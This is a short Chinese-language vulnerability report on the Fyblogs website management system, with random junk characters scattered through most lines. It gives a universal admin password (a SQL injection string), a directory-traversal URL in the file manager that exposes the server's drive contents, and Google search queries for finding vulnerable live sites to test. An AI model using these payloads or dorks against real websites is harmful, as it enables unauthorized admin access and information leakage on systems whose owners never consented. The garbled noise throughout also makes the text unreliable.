漏洞类型: 未授权访问/权限绕过
$ Y6 `; h( x, p+ H4 e6 w8 @) @! o' R2 R3 B/ {, _7 a; m
简要描述:6 f0 k# j+ S' R1 T1 q. x
) A+ i6 M6 L9 `. s, O
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
5 ?& f5 A0 f6 X5 i8 @: `; F2 `! G+ V6 K/ `1 A! D
详细说明:
( u" ^1 h6 X) `/ h0 N, ^
' m5 h( c: H% F5 g% V9 y5 h后台万能密码 'or'='or'
3 z8 e% Q8 x" V1 V; i; \后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露! u4 [2 m+ E" @" y$ n; o' z
admin/uploadfile.asp?currentFolder=/upfiles/../9 T+ A2 o: S6 }4 {$ c
5 m) ~ c* f1 W' s2 j) F7 R! t
漏洞证明:, B' b4 U7 M5 Y, F' h3 T1 L1 }/ F* R
* `* U0 o7 V8 t9 Z# J1 K
谷歌:inurl:type.asp?id=1 新闻中心$ ?/ B: ~# R! G, j& N5 N/ Y; t+ @
或者 :inurl:download_ok.asp?) ^. `# d. K( q: I$ m2 q
4 m J7 b# ]* x6 W% x" n可以测试9 |7 n3 L# P7 ^( m
9 ]: G; A8 y2 q& \8 T
2 h9 X# V( U/ N1 ^6 ^& C2 v, x |